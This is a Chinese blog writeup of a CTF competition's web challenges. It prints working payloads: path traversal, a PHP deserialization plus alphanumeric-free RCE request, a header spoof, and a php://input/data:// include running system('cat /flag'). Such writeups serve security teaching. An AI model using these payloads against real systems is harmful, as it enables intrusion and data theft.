电科院密码保密与信息安全竞赛网络攻防宣传赛 Writeup

最新推荐文章于 2024-05-14 21:12:31 发布
最新推荐文章于 2024-05-14 21:12:31 发布
阅读量293 收藏 7
点赞数 5
分类专栏: CTF相关 文章标签: 网络安全 php 安全 web安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHTXRT/article/details/137357985
版权

一、 战队信息

战队名称:20221214

战队排名:1

二、 解题过程

ctf1

用Winhex打开,最后有一串编码字符,拿去一把梭即可。

ctf2

目录穿越

GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/flag

ctf3

仔细观察可以看到url编码后的SQL注入语句,mid用于截取字符串,当出现welcome admin!说明该字符正确,将正确的字符逐个写入到C脚本变量中,输出得到flag。

char a[] = {102,108,97,103,123,99,49,52,50,54,53,97,53,51,98,101,99,49,56,52,56,98,102,97,99,50,100,102,100,97,51,101,54,54,55,98,99,125};
	cout << a;

ctf4

打开网页,一个简单的反序列化+困难的无字母数字RCE,序列化代码如下:

class icunqi{
    public $code = "ls";	//要执行的代码
}

$ta = new icunqi();
echo urlencode(serialize($ta));

将得到的一串字符放入 ?code=后即可。

无字母数字RCE可以使用PHP任意文件上传漏洞,即向 PHP 发送 Post 数据包,如果数据包中包含文件,无论 php 代码中有没有处理文件上传的逻辑,php 都会将这个文件保存为一个临时文件:

  • 该文件默认存储在 /tmp 目录中『可通过 php.iniupload_tmp_dir 指定存储位置』
  • 文件名为 php[6个随机字符],例:phpG4ef0q

HTTP请求如下:

POST /?code=O%3A6%3A%22icunqi%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A10%3A%22%2F%3F%3F%3F%2F%5B%60-%7B%5D%22%3B%7D HTTP/1.1
Host: 39.106.48.123:28692
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714
Connection: close

-----------------------------7dbff1ded0714
Content-Disposition: form-data; name="file"; filename="test.txt"

#!/bin/sh

whoami
-----------------------------7dbff1ded0714--

在上传文件的同时执行 . /???/????????[@-[ 即可有概率执行 whoami,多尝试几次即可。

随后执行 ls,看到包含flag的文件,cat 即可得到 flag。

ctf5

根据提示,在请求头添加 X-Forward-For:1.1.1.1,得到flag。

ctf6

打开页面,看到提示: flag in cream,打开/cream.php,感觉考察的是代码审计。

<?php
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['file'])&&strlen($_GET['file'])>strlen("flag in cream")){
    die("too long,no flag");
}
$fp = fopen($_GET['file'], 'r+');
if(preg_match("/php|file|http|eval|exec|system|popen|flag|\<|\>|\"|\'/i", $_GET['content'])){
    die("hacker");
}
fputs($fp, $_GET['content']);
rewind($fp);
$data=stream_get_contents($fp);
include($data);
?>

简而言之就是通过 get 可以提交两个变量:filecontent。PHP首先根据 file 为路径打开一个文件,然后把 content 写进去(从文件头开始),之后再执行文件里的代码。

但其实,我尝试了几个 file 都写不进去,于是尝试 php 伪协议,get 参数为?file=php://input,方法改为POST,请求体为 data://text/plain,<?php phpinfo();得到 phpinfo

phpinfo() 改为 system('cat /flag') 即可得到 flag。

CHTXRT
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
数据中心与大数据安全专项方案电科院.docx
11-21
数据中心与大数据安全专项方案电科院.docx
关基网络战时代,宁网安电力网络攻防靶场全面提升电网安全防护力
Cyberpeace的博客
04-19 1340
随着网络空间成为与陆地、海洋、天空、太空同等重要的人类活动新领域,自网络空间向物理电网发起攻击,破坏电力等国家关键基础设施成为当前大国博弈、大规模战争的重要手段和常态进攻形式。同时,新型电力系统建设发展驱动电力系统形态和控制方式的深刻变革——调度对象更加多元,网架结构更加复杂;开放程度不断提升,网络边界不断扩展,电力系统网络安全防护工作面临前所未有的挑战。2021年,国家能源局发布《电力安全生产“十四五”行动计划》号召搭建高仿真行业级网络安全仿真验证环境,局委接连发布相关工作任务与指导意见。
科技核心期刊:电力信息与通信技术投稿
qq_42031950的博客
12-06 564
主要栏目包括支撑双碳的能源电力关键技术、支撑新型电力系统的信息通信技术与应用、需求侧响应和负荷柔性化技术、能源互联网、新型电力系统信息安全、电力物联网、量子通信、区块链、数字孪生、智能传感、人工智能等。电力信息与通信技术是电力方面较为强的科技核心,与中国电机工程学报、高电压技术等期刊一样都是国网电科院主板的杂志,因此在电力行业内具有较高的认可度。4. 利益冲突——所有作者均需公开任何现有或潜在的利益冲突,即作者在提交稿件后三年内与他人或组织之间的任何财务、个人的或其他关系的利益冲突。10天后收到录用通知。
20231911 2022-2023-2 《网络攻防实践》实验三
要变老程序员不的博客
03-24 679
打开电科院官网,可以看到访问 https://www.besti.edu.cn 过程中访问问4个Web服务器,ip分别为152.195.38.76,34.107.221.82,203.208.50.98以及最后一个电科院的ip123.121.151.1。他们的IP地址都是什么?”,因此说明这一段中,攻击者通过ARP广播的方式进行了活跃主机检测。还有处TCP之外的一些其他协议,这说明攻击者通过与检测出的端口进行上层的交流,检测到了一些网络服务,可以得出,攻击者在这一次攻击中扫描了服务。
20155334 《网络攻防》 Exp9 Web安全基础
weixin_30951231的博客
05-26 91
网络攻防》 Exp9 Web安全基础 一、实验后回答问题 SQL注入攻击原理,如何防御: 原理: 就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 防御: 检查变量数据类型和格式只要是有固定格式的变量,在SQL语句执行前,应该严格按照固定格式去检查,确保变量是我们预想的格式,这样很大程度上可以避免SQL注入攻击。 过滤特...
电力工控网络安全防护技巧探讨及建议(山东电科院王文婷).pptx
09-04
山东电科院王文婷在2018年大数据及人工智能技术应用交流演讲做的报告“电力工控网络安全防护技巧探讨及建议”,主要涉及严峻和复杂的网络安全形势、我国网络安全战略及政策、电力行业工控网络安全特点、电力工控网络...
中国电科院linux系统安全评审整改方案
06-29
中国电科院系统安全评审整改方案 centos 7 系统安全整改方案 包含:安全启动、认证鉴权、访问控制、 安全审计、外围接口、终端升级等
数据中心与大数据安全方案-电科院.docx
06-22
数据中心与大数据安全方案-电科院 数据中心与大数据安全方案-电科院全文共57页,当前为第1页。数据中心与大数据安全方案-电科院全文共57页,当前为第1页。 数据中心与大数据安全方案-电科院全文共57页,当前为第1页...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8217
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
字符画生成网站 ascii字符画
wow_awsl_qwq的博客
05-12 245
_____ / ___/__ ___ / /__/ _ \/ _ \ \___/ .__/ .__/ /_/ /_/
如何防止WordPress网站内容被抓取
AIDigital的博客
05-09 449
最近在检查网站服务器的访问日志的时候,发现了大量来自同一个IP地址的的请求,用站长工具分析确认了我的网站内容确实是被他人的网站抓取了,我第一时间联系了对方网站的服务器提供商投诉了该网站,要求对方停止侵权行为,然而这只能暂时性的解决问题,为了避免以后再有意外发生,我结合了咨询Hostease的技术支持得到的反馈以及自己从网上了解到的信息,做了以下的优化,分享出来希望能对大家有一些帮助。抓取工具在抓取网站内容的时候,需要依赖网站的RSS feed,对RSS feed做一些小的调整,就可以防止内容被抓取。
阿里云服务器下,部署LNMP环境安装wordpress
dl_11的博客
05-14 264
在阿里云环境下部署LNMP服务时,尤其是安装MySQL了时需要注意,和centos7不完全一样。在利用LNMP环境部署wordpress时,一定要先测试LNMP环境没问题,再部署wordpress,不然找问题好麻烦。MySQL和PHP,版本不同,部署和配置的方法不同,所以如果是安装的其他版本的本文章中的方法不一定实用。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 305
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
Service 和 Ingress
go|Python的个人博客
05-08 1320
Yaml 文件案例metadata:labels:app: nginx-svc # service 自己的标签spec:ports:- name: http # service 端口配置的名称protocol: TCP # 端口绑定的协议,支持 TCP、UDP、SCTP,默认为 TCPport: 1080 # service 自己的端口targetPort: 80 # 目标 pod 的端口type: NodePort # 默认是ClusterIP 类型,只能在集群内部使用。
WordPress如何判断当前页是否属于文章页或页面?
boke112的博客
05-08 315
我想在WordPress站点的文章页和页面中输出一些内容,其他页面不输出,那么我应该怎么判断当前页是否为文章页或页面呢?下面boke112百科就跟大家简单介绍一下。
Laravel中使用MinIO进行文件操作及ZIP解压
我码玄黄的博客
05-14 220
在本指南中,我们将详细介绍如何在laravel框架中操作minio,包含方法有:桶列表,创建桶,修改桶,上传文件,删除文件,生成直传链接,解压zip的php脚本
NSSCTF中的1zjs、作业管理系统、finalrce、websign、简单包含、Http pro max plus
最新发布
2401_82388450的博客
05-14 454
1.php代码中要是有exec()函数,应该想到无回显的RCE2.遇到waf中的控制字符串长度,应该如何绕过3.了解到了http请求头中的其他参数,以及他们的作用。
TCP的延时应答和捎带应答详解
2201_75437633的博客
05-11 194
延时应答是指TCP接收方在接收到数据包后,并不立即发送确认(ACK)消息,而是等待一段时间,以期望在该时间段内收到更多的数据包,从而实现合并多个ACK消息为一个,减少网络中的确认消息数量,提高网络利用率。捎带应答是指TCP发送方在发送数据包时,如果此时正好有确认消息需要发送,则将确认消息捎带在数据包中一起发送,从而减少网络中的确认消息数量,提高网络利用率。在这个示例中,服务器端在接收到消息后延迟1秒才发送确认消息,这样做的目的是为了等待可能在1秒内到达的更多数据包,并合并多个ACK消息。
电科院信息安全测评怎么做
02-06
电科院信息安全测评是指对电科院的信息系统进行安全评估的过程。 为了进行信息安全测评,您需要按照以下步骤进行: 1. 了解您的信息系统:首先,您需要对您的信息系统进行全面了解,包括系统的结构、功能、数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值